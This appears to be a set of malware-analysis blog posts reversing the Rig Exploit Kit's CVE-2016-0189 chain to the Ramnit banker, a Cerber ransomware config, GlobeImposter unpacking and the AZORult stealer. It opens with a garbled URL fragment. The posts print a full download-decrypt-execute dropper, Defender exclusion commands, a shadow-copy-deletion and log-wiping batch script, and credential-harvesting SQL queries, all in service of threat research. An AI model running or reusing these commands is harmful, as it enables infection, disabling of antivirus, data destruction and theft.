l_-j_3k_-s_-y_2x_s_-4e_8o_-1m_2i_63_-2i_-1g_i_2f_-34_3l_1l_-1c_ag_-2k_2f_p9_-2a_2c_61_-3n_1r_nb_-1u_3q_q_-24_2k_84_a_2o_5n_v_3_la_g_-1s_iw_0_-1s_3g_-1e_-1s_es_-o_-1s_er_-x_-1h_bo_-31_-18_pd_-u_5r_1w_-32_1s_p_-3j_2p_2v_12_12_1v_-33_f_e_-3e_24_j1_-2b_-1a_67_-a_2g_gn_-1s_-1e_73_-1_2e_e9_-2t_2f_b5_29_1g_dk_-16_2m_m6_-2q_-27_3r_-1y_-4b_mo_3_-z_ek_-2a_-2f_ev_-49_-3_d4_-2c_33_92_-1f_2p_fs_-2w_1z_l7_-32_1b_ay_-36_-f_eo_-1m_-1m_aw_-2x_1k_at_-2c_3q_r2_-2g_-11_qz_27_13_jm_-1w_3x_9k_-3s_-18_9j_-1_-1z_jn_u_3i_dl_-1n_2t_4q_-2b_-45_8v_-4d_11_au_-2x_5_49_9_-5_7t_-2q_-z_6h_-3c_13_2o_-28_-1j_3d_1y_-y_3_-3x_-14_34_-1d_-t_4y_-37_20_65_1r_1s_bs_-4d_1h_46_26_1r_nu_-2_-q_32_22_-r_ow_14_6l_p3_24_6h_p2_-8_6h_oz_a_6t_ol_o_-1t_a_-p_-2g_m2_1i_2f_5s_-3l_14_kq_1y_1e_94_-f_-2f_j0_%22%2C%22cx%22%3A20.806092585307955%2C%22cy%22%3A-17.32674591826775%2C%22sw%22%3A1554.5151079090979%2C%22sh%22%3A679.3283956242936%2C%22z%22%3A0.25048044372185396%7D&gco_forceIFrame=true&gco_hasLabelsColumn=true&att=true&width=800&height=500 https://fusiontables.google.com/embedviz?q=select+col1+from+1uZfgN0_tazPf9UVoIIiptra5ByDAanDFIcGX384g&viz=MAP&h=false&lat=28.269753263159743&lng=-6.4424593749999985&t=3&z=2&l=col1&y=2&tmplt=2&hml=TWO_COL_LAT_LNG 

Heatmap Node Map

Let’s Learn: In-Depth Reversing Rig Exploit Kit’s VBScript Memory Corruption (CVE-2016-0189)

Goal: Reverse the latest exploit payload (CVE-2016-0189) from the Rig Exploit Kit (RigEK) and its chain leading to Ramnit banker based on the user-agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E).
Source: Seamless gate leading to RigEK and Ramnit banker.
Tools: Fiddler, Internet Explorer, Firefox Web-Developer plugin



The observed URI parameters are from thee RigEK URI 81.177[.140.137 (AS8342 RTCOMM-AS, RU):

  • NjA0MjE0/NDg3NDE4
  • mano
  • pano
  • gift
  • work
Background
While investigating the Rig EK observed its served exploit CVE-2016-0189 (VBScript Memory Corruption) based on the user-agent string “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E).” Previously, the same exploit kit was serving the Rig EK CVE-2015-8651 Adobe Flash exploit based on the same user-agent string.

Steps:
(1) Obtain the RigEK response from Fiddler.
(2) Debug the payload in Web-Developer plugin by setting up the breakpoint on bx or return and copying the decoded payload.


(3) Observe the full decoded VBS code from RigEK’s CVE-2016-0189 function, which is almost an exact copy of the Github CVE-2016-0189 page (minus a few variable changes and change ShellExecute to Run functions for obfuscation purposes). In this matter, CVE-2016-0186 is also known as  “Scripting Engine Memory Corruption Vulnerability.”


(4) Finally, observe the Ramnit banker drop from the RigEK leveraging the exploit.

The CVE-2016-0189 exploit allows remote code execution and transfers control to the following decoded beatified cmd command that downloads an encoded binary, decrypts, and runs the Ramnit banker as follows:


cmd.exe / q / c cd / d “%tmp%” && echo

function O(l) {
    var w = “pow”,
        j = 4 * 9;
    return A.round((A[w](j, l + 1) – A.random() * A[w](j, l))).toString(j)[“slice”](1)
};

function V(k) {
    var y = a(e + “.” + e + “Request.5.1”);
    y.setProxy(n);
    y.open(“GET”, k(1), 1);
    y.Option(n) = k(2);
    y.send();
    y.WaitForResponse();
    if (200 == y.status) return _(y.responseText, k(n))
};

function _(k, e) {
    for (var l = 0, n, c = [], F = 5 + 5 * 50, S = String, q = [], b = 0; 256 ^ > b; b++) c[b] = b;
    for (b = 0; 256 ^ > b; b++) l = l + c[b] + e.charCodeAt(b % e.length) ^ & F, n = c[b], c[b] = c[l], c[l] = n;
    for (var p = l = b = 0; p ^ < k.length; p++) b = b + 1 ^ & F, l = l + c[b] ^ & F, n = c[b], c[b] = c[l], c[l] = n, q.push(S.fromCharCode(k.charCodeAt(p) ^ ^ c[c[b] + c[l] ^ & F]));
    return q.join(“”)
};
try {
    u = WScript, o = “Object”, A = Math, a = Function(“b”, “retu” + “rn u.Create” + o + “(b)”);
    P = (“” + u).split(” “)[1], M = “indexOf”, q = a(P + “ing.FileSystem” + o), m = u.Arguments, e = “WinHTTP”, Z = “cmd”, U = “DEleTefIle”, j = a(“W” + P + “.Shell”), s = a(“ADODB.Stream”), x = O(8) + “.”, p = “exe”, n = 0, K = u[P + “FullName”], E = “.” + p;
    s.Type = 3 – 1;
    s.Charset = “iso-8859-1”;
    s.Open();
    try {
        v = V(m)
    } catch (W) {
        v = V(m)
    };
    d = v.charCodeAt(20 + 1 + v[M](“PE\x00\x00”));
    s.WriteText(v);
    h = “dll”;
    if (31 ^ < d) {
        var z = 1;
        x += h
    } else x += p;
    s.savetofile(x, 2);
    s.Close();
    C = ” /c “;
    Y = “gsvr32”;
    z ^ & ^ & (x = “re” + Y + E + ” /s ” + x);
    j.run(Z + E + C + x, 0)
} catch (N) {};
q[U](K); > o32.tmp && start wscript //B //E:JScript o32.tmp “wexykukusw” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)” “http://81.177.140%5B.%5D137/?NDg3NDE4&mano=%5BREDACTED%5D&pano=%5BREDACTED%5D&work=MzY0MzM0NjY=&#8221;


The shortened relevant function is as follows (commented):

start wscript //B //E:JScript o32.tmp “wexykukusw” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)”http://81.177.140%5B.%5D137/?NDg3NDE4&mano=%5BREDACTED%5D&pano=%5BREDACTED%5D&work=MzY0MzM0NjY=&#8221;


Indicators of Compromise (IOCs):
08-15-2017 – RigEK server 81.177.140[.]137 (AS8342 RTCOMM-AS, RU)
08-15-2017 – RigEK exploit CVE-2016-0189 landing
SHA-1: 7993998d5f50bb7a3f8575fdfdb93f3386dbacde
Link
08-15-2017 – Ramnit Banker 
SHA-1: 667d40d8c7c10f027ac57e91c509ddd56b8bc736


Let’s Learn: How to Obtain Cerber (CRBR) Ransomware Configuration

Goal: Learn obtaining Cerber ransomware, or CRBR encryptor, configuration leveraging its string compare function StrCmpNIA from SHLWAPI.dll. 
SourceMalwarebytes

SHA-1: 4BDD366D8EE35503CF062AE22ABE5A4A2D8D8907 
ToolollyDbgCFF Explorer

Background:
This reversing technique is based on source-code level understanding of the Cerber string parsing function leveraging library “SHLWAPI.” The initial discovery is based on source-code level understanding of the ransomware.
Steps:
  • Observe the malware in CFF Explorer and its import address table (IAT). Note that the malware does not contain the above referenced SHLWAPI library; therefore, we have to wait until the malware loads this library dynamically.
  • Go to “Options” -> “Events” and set up a check on “Break on new module (DLL)”
  • Observe the loaded SHLWAPI library in the DLL section.
  • Go to “Expression to follow” and enter “StrCmpNIA” and remove the initial check on “Break on new module (DLL)”
  • Run until you observe the StrCmpNIA function with the following call:
0012FB84   00403DBA  /CALL to StrCmpNIA
0012FB88   0129DCD0  |S1 = “{“blacklist”:…}”
0012FB8C   01299548  |S2 = “NULL”
0012FB90   00000004  \N = 4
  • Backup and save the data to file. Enjoy!
Here is the full extracted Cerber config:

{“blacklist”:{“files”:[“bootsect.bak”,”iconcache.db”,”ntuser.dat”,”thumbs.db”],”folders”:[“:\\$getcurrent\\”,”:\\$recycle.bin\\”,”:\\$windows.~bt\\”,”:\\$windows.~ws\\”,”:\\boot\\”,”:\\documents and settings\\all users\\”,”:\\documents and settings\\default user\\”,”:\\documents and settings\\localservice\\”,”:\\documents and settings\\networkservice\\”,”:\\intel\\”,”:\\logs\\”,”:\\msocache\\”,”:\\perflogs\\”,”:\\program files (x86)\\”,”:\\program files\\”,”:\\programdata\\”,”:\\recovery\\”,”:\\recycled\\”,”:\\recycler\\”,”:\\system volume information\\”,”:\\system.sav\\”,”:\\temp\\”,”:\\windows.old\\”,”:\\windows10upgrade\\”,”:\\windows\\”,”:\\winnt\\”,”\\appdata\\local\\”,”\\appdata\\locallow\\”,”\\appdata\\roaming\\”,”\\local settings\\”,”\\public\\music\\sample music\\”,”\\public\\pictures\\sample pictures\\”,”\\public\\videos\\sample videos\\”,”\\tor browser\\”],”languages”:[1049,1058,1059,1064,1067,1068,1079,1087,1088,1090,1091,1092,2072,2073,2092,2115]},”check”:{“language”:1},”debug”:0,”default”:{“bchn”:”1GcnsLs7C31uuroNmUHwwbB5xQeNvm63Ee”,”site_1″:”tor2web-.org”,”site_2″:”onion.link”,”site_3″:”onion.nu”,”site_4″:”onion.cab”,”site_5″:”onion.to”,”tor”:”oqwygprskqv65j72″},”encrypt”:{“bytes_skip”:2048,”divider”:327680,”encrypt”:1,”files”:[[“.doc”,”.docx”,”.xls”,”.xlsx”,”.jpg”,”.jpeg”,”.pdf”,”.rar”,”.zip”,”.ppt”,”.pptx”,”.avi”,”.mpg”,”.mpeg”,”.wmv”]],”max_block_size”:16,”min_file_size”:3072,”multithread”:1,”network”:1,”rsa_key_size”:880,”threads_per_core”:1},”global_public_key”:”LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2a3R5NXFocUV5ZFI5MDc2RmV2cAowdU1QN0laTm1zMUFBN0dQUVVUaE1XYllpRVlJaEJLY1QwL253WXJCcTBPZ3Y3OUsxdHRhMDRFSFRyWGdjQXAvCk9KZ0JoejlONThhZXdkNHlaQm0yY29lYURHdmNHUkFjOWU3Mk9iRlEvVE1FL0lvN0xaNXFYRFd6RGFmSThMQTgKSlFtU3owTCsvRytMUFRXZzdrUE9wSlQ3V1NrUmI5VDh3NVFnWlJKdXZ2aEVySE04M2tPM0VMVEgrU29FSTUzcAo0RU5Wd2ZOTkVwT3BucE9PU0tRb2J0SXc1NkNzUUZyaGFjMHNRbE9qZWsvbXVWbHV4amlFbWMwZnN6azJXTFNuCnFyeWlNeXphSTVEV0JEallLWEExdHAyaC95Z2JrWWRGWVJiQUVxd3RMeFQyd01mV1BRSTVPa2hUYTl0WnFEMEgKblFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==”,”help_files”:{“files”:[{“file_body”:”REDACTED”,”file_extension”:”.txt”}],”files_name”:”_HOW_TO_DECRYPT_MY_FILES_{RAND}_”,”run_by_the_end”:1},”self_deleting”:1,”servers”:{“statistics”:{“data_finish”:”e01ENV9LRVl9″,”data_start”:”e01ENV9LRVl9e1BBUlRORVJfSUR9e09TfXtJU19YNjR9e0lTX0FETUlOfXtDT1VOVF9GSUxFU317U1RPUF9SRUFTT059e1NUQVRVU30=”,”ip”:[“15.42.13[.0/27″,”44.66.140[.0/27″,”87.98.176[.0/22″],”port”:6893,”send_stat”:1,”timeout”:255}},”wallpaper”:{“change_wallpaper”:1,”background”:139,”color”:16777215,”size”:13,”text”:”                     \n   CRBR ENCRYPT0R    \n                     \n\n  Y0UR DOCUMENTS, PHOTOS, DATABASES AND OTHER IMP0RTANT FILES  \n  HAVE BEEN ENCRYPTED!  \n\n  The only way to decrypt your files is to receive  \n  the private key and decryption program.  \n\n  To receive the private key and decryption program  \n  go to any decrypted folder – inside there is the special file (*_R_E_A_D___T_H_I_S_*)  \n  with complete instructions how to decrypt your files.  \n\n  If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC,  \n  follow the instructions below:  \n\n  1. Download \”Tor Browser\” from https://www.torproject.org/ and install it.  \n  2. In the \”Tor Browser\” open your personal page here:  \n\n  http://{TOR}.onion/{PC_ID}  \n\n  Note! This page is available via \”Tor Browser\” only.  \n\n\n”},”whitelist”:{“folders”:[“\\bitcoin\\”,”\\excel\\”,”\\microsoft sql server\\”,”\\microsoft\\excel\\”,”\\microsoft\\microsoft sql server\\”,”\\microsoft\\office\\”,”\\microsoft\\onenote\\”,”\\microsoft\\outlook\\”,”\\microsoft\\powerpoint\\”,”\\microsoft\\word\\”,”\\office\\”,”\\onenote\\”,”\\outlook\\”,”\\powerpoint\\”,”\\steam\\”,”\\the bat!\\”,”\\thunderbird\\”,”\\word\\”]}}

08-10-2017 – Rig Exploit Kit Leads to Ramnit aka "demetra" Banker via CVE-2015-8651

Goal: Reverse the Rig Exploit Kit infection chain leading to Ramnit “demetra” banking Trojan.
Source: Malicious traffic
Tools: Fiddler, JPEXS, OllyDBG

Traffic Chain: 

Seamless gate ->
-> Rig EK Landing ->  
http://188.225.78%5B.%5D174/?MTUzNzcy&pan=..&man=..&work=..
-> Rig EK CVE-2015-8651 Adobe Flash exploit
http://188.225.78%5B.%5D174/?NDYzMzgw&pan=..&man=..&shop=..
-> Ramnit Payload
%TEMP%
-> Ramnit Payload (via its getexec command)


I. RigEK’s observed URI parameters are as follows (User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)):

  • MTUzNzcy (base64 landing)
  • NDYzMzgw (base64 exploit)
  • man
  • pan
  • work
  • shop
II. Adobe Flash Player Exploit (CVE-2015-8651):
Upon successful exploitation of the integer overflow vulnerability (si32 and li32), the exploit runs a shellcode downloading and executing the Ramnit banker. See more here.
Interesting function name

cremea_freedom

Ramnit aka “demetra” banking Trojan (dropped in %TEMP%; concatenates :Zone.Identifier as svchost[.]exe to the string and attempts to remove it as an anti-analysis trick, and leverages User Account Control (UAC) bypass method using application compatibility databases based on sdbinst[.]exe):

  • AvTrust
  • Antivirus Trusted Module v2.0 (AVG, Avast, Nod32, Norton, Bitdefender)
  • XX’S
  • Chrome reinstall
  • Chrome reinstall module (x64-x86) v0.1
  • CookieGrabber
  • Cookie Grabber v0.2 (no mask)
  • FtpGrabber2
  • Ftp Grabber v2.0
  • XX’S
  • Hooker
  • Spy module (Zeus, SE, Rootkit, Ignore SPDY) v4
  • VNC IFSB
  • VNC IFSB x64-x86

Ramnit anti-virus exclusion registry script:

  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v svchost.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v consent.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v rundll32.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v spoolsv.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v explorer.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v rgjdu.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v afwqs.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  ” /v *.tmp /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  ” /v *.dll /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  ” /v *.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v svchost.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v consent.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v rundll32.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v spoolsv.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v explorer.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v rgjdu.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v afwqs.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  ” /v *.tmp /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  ” /v *.dll /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  ” /v *.exe /t  REG_DWORD /d 0 

Targets US-based financial institutions leveraging its webinjects (same as 8-7-2017):
Indicators of compromise (IOCs):
Rig EK Landing:
Rig EK CVE-2015-8651 Exploit Flash integer overflow vulnerability:

Ramnit initial:

Ramnit getexec payload: 

Let’s Learn: How to Unpack GlobeImposter ".726" Ransomware

Goal: Unpack GlobeImposter ransomware payload using WriteProcessMemory API buffer’s dump (check out the same method as Locky from the previous blog).
ToolollyDbgCFF Explorer, IDA Pro
Credit@dvk01uk
Malware SHA-256: 5b88544bebacba38708685b905a94742c7798bf64b6f90f46acbc3f6de4399e7
Original GlobeImposter sample:

Background
GlobeImposter ransomware utilizes a loader/patcher algorithm patching and unloading the decoded payload in memory.

Theory
GlobeImposter ransomware patches itself using CreateProcessA API setting the creation flag to CREATE_SUSPENDED and writing itself into the buffer via WriteProcessMemory API. Next, the ransomware process won’t be executed immediately; it does not start until called ResumeThread. So, the ransomware has time to patch in memory.

Practice:
I. Load Ollydbg and click “File” ->
II. Click “Go to” -> “Expression” -> Type “WriteProcessMemory” and set up a breakpoint on it using F2.
III. Run the process using F9 and follow buffer to observe the unpacked GlobeImposter in the dump section.
IV.  Then, click on “Backup” -> “Save data to file.”
V. Verify the exported payload and IAT in CFF Explorer. Profit!
VI. Enjoy analyzing the decoded payload in IDA Pro!
(1) Registry persistency:

HKEY\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\CertificatesCheck
(b) GlobeImposter vssadmin & host script:
  GetTempFileNameW(&PathName, L”__tmp”, 0, &TempFileName);
  lstrcatW(&TempFileName, L”.bat”);
  result = CreateFileW(&TempFileName, 0x40000000u, 0, 0, 2u, 0x80u, 0);
  v1 = result;
  if ( result != (HANDLE)-1 )
  {
    v2 = lstrlenA(“@echo off\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nreg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\” /va /f\r\nreg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\” /f\r\nreg add \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\”\r\ncd %userprofile%\\documents\\\r\nattrib Default.rdp -s -h\r\ndel Default.rdp \r\nfor /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\””);
    WriteFile(
      v1,
      “@echo off\r\n”
      “vssadmin.exe Delete Shadows /All /Quiet\r\n”
      “reg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\” /va /f\r\n”
      “reg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\” /f\r\n”
      “reg add \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\”\r\n”
      “cd %userprofile%\\documents\\\r\n”
      “attrib Default.rdp -s -h\r\n”
      “del Default.rdp \r\n”
      “for /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\””,
      v2,
      &NumberOfBytesWritten,
      0);
    CloseHandle(v1);
    result = (HANDLE)sub_4126D7(&TempFileName);
(c) RSA public encryption key function value:
 v18 = RSA_Encrypt_Function(
          “A57EEE174A1DBCC23CD0CC6045AF9E1CF07706D30588C86941DEC3DA5AA5483BBC85988DA7B18B5C18DA8BF09CC8AF7FD46E7DD57F729A”
          “3D122387BCFE8B86F7A1D051895CD8ABE50F52913C62729979155C7CEF78B114921691FD7F1E1B206B5F98700A053CF04DBE1C44A2D843”
          “EF0C85468F61ABCF5559FE56F124C383B538F4F16ADB61C42AB3B6BFBDDAB4ADC9CB9DFA615A6506CFCAA752C78B270C568B786FF9D50C”
          “A30E21C5431F83E4A2A7695C24BA262233F28D4253CB01C64410C246291DCE84147EB593730A90F013423DE1DFEA1823CCD07B82C36F6E”
          “EF0F6916219D036D395C4CEEC4FDF20CD997ABB3B8B1F2B6D4BBB5065E31516D7386BD23”,
          v15,
          0xC0u);

….
  v3 = lpString;
  memset(&v8, 0, 0x400u);
  memset(&v10, 0, 0x200u);
  sub_4108D0(&v12, v4);
  sub_40FBC8(&v11);
  sub_40FDEC(&v9);
  v5 = lstrlenA(“rsa_encrypt”);
  if ( !sub_40FB4F((int)&v11, (int)&v9, “rsa_encrypt”, v5) && !sub_40F391(&v14, v3) && !sub_40F391(&v15, “010001”) )
  {
    v13 = (unsigned int)(sub_40F4AA(&v14) + 7) >> 3;
    memmove(&v8, a2, a3);
    if ( sub_41028B(&v11, v6, a3, &v8, (int)&v10) )

      memset(&v10, 0, a3);
(d) Taskill function terminating the following processes:
  • “sql”
  • “outlook”
  • “ssms”
  • “postgre”
  • “1c”
  • “excel”
  • “word”
 memset(&StartupInfo, 0, 0x44u);
  StartupInfo.cb = 68;
  result = CreateToolhelp32Snapshot(2u, 0);
  v2 = result;
  if ( result != (HANDLE)-1 )
  {
    pe.dwSize = 556;
    Process32FirstW(result, &pe);
    do
    {
      v3 = (LPCSTR *)off_41B950;
      while ( 1 )
      {
        v4 = sub_4128DF(pe.szExeFile, 0);
        v5 = lstrlenW(pe.szExeFile);
        for ( i = 0; i < v5; i = v8 + 1 )
        {
          v7 = sub_40C31A((char *)v4[i]);
          v4[v8] = v7;
        }
        if ( StrStrA(v4, *v3) )
          break;
        ++v3;
        if ( (signed int)v3 >= (signed int)&unk_41B96C )
          goto LABEL_10;
      }
      v9 = HeapCreate(0, 0x1000u, 0);
      v10 = (CHAR *)HeapAlloc(v9, 0, 0x100u);
      wsprintfA(v10, “%d”, pe.th32ProcessID);
      lstrcpyA(&String1, “taskkill /F /T /PID “);
      lstrcatA(&String1, v10);
      CreateProcessA(0, &String1, 0, 0, 0, 0x8000000u, 0, 0, &StartupInfo, &ProcessInformation);
LABEL_10:
      ;
    }
    while ( Process32NextW(v2, &pe) );
    result = (HANDLE)CloseHandle(v2);
  }
  return result;
(d) Targeted exclusion extensions and README extortion message in Olly:

Let’s Learn: Reversing Credential and Payment Card Information Stealer ‘AZORult V2’

Goal: Reverse the second version of the popular credential and payment card information stealer “AZORult”
Original find: @DynamicAnalysis
Source:  AU2_EXEsd.exe
Tool: OllyDBG, CFF Explorer

Brief overview: AZORult Version 2 Stealer, written in Borland Delphi collects informations, sends a report to the C2 server, then self-deletes. AZORult steals cookies, saved passwords, and saved credit card information from browsers. It also steals XMPP and Bitcoin wallet information Additionally, the malware is able to grab files from Desktop with specified extensions. It supports .bit domain communication.
Command-and-Control (C2) Serverparking-services[.]us/gate[.]php
Mutex: as8d749s8adq98w4d65sa1


AZORult’s getcfg=ADE97CA-F64C8173-1D26C270-B040AB046 value


It encodes streams and separates the report information as follows:
  • Browsers\AutoComplete\_CC.txt
  • Browsers\AutoComplete\__.default
  • Browsers\Cookies\__.default.txt
  • IP.txt
  • Passwords.txt
  • CookieList.txt
  • SYSInfo.txt
AZORult’s custom base64-like alphabet:
Obtains Windows version via ProductName Registry value:
The harvested SYSINFO victim information is in the following format:

  • BIN: 
  • MachineID :   -> SOFTWARE\Microsoft\Cryptography\MachineGuid
  • EXE_PATH  :  
  • DLL_PATH  :  
  • Windows    :  – > SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName
  • Comp(User) : 
  • CPU Model: ->   HARDWARE\DESCRIPTION\System\CentralProcessor\0\ ProcessorNameString
  • [System Process]
  • [Programms]

AZORult obtains the user and computer information via usual GetUserName and GetComputerName APIs.


The stealer targets the following applications for credential harvesting:

p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; -webkit-text-stroke: #000000} li.li1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; -webkit-text-stroke: #000000} span.s1 {font-kerning: none} ul.ul1 {list-style-type: disc}

  • Google Chrome (including x64)
  • YandexBrowser
  • Opera
  • Firefox
  • Orbitum
  • Chromium
  • Amigo
  • Outlook
  • FileZilla
  • WinSCP
  • Thunderbird
  • 360Browser
  • Vivaldi
  • Bromium
  • InternetMailRu
  • Bromium
  • Nichrome
  • RockMelt
  • Skype
  • Steam
The stealer collects  XMPP/Jabber credentials from the following apps:

  • PsiPlus
  • Psi
  • Pidgin

Moreover, AZOrult aslo appear to collet the following cryptocurrency files:
  • wallet.dat
  • \wallet.dat
  • electrum.dat
  • \electrum.dat
  • .wallet
  • \.wallet
  • %APPDATA%\MultiBitHD
  • mbhd.wallet.aes
  • \MultiBitHD\
  • \mbhd.wallet.aes
  • \mbhd.checkpoints
  • mbhd.checkpoints
  • \mbhd.spvchain
  • mbhd.spvchain
  • \mbhd.yaml
  • mbhd.yaml
  • wallet_path
  • Software\monero-project\monero-core
  • \Monero\
Desktop file grabber of files with .txt & .dat extensions.

For example, here is AZORult’s cookie/credit card grabber from Mozilla Firefox’s Sqlite tables: 
  • SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
  • SELECT host_key, name, encrypted_value, value, path, secure, expires_utc FROM cookies
  • SELECT host_key, name, name, value, path, secure, expires_utc FROM cookies
  • SELECT fieldname, value FROM moz_formhistory
  • SELECT name, value FROM autofill
  • SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted value FROM credit_cards
Self-delete function:

li.li1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; -webkit-text-stroke: #000000} span.s1 {-webkit-text-stroke: 0px #000000} span.s2 {font-kerning: none} ul.ul1 {list-style-type: disc}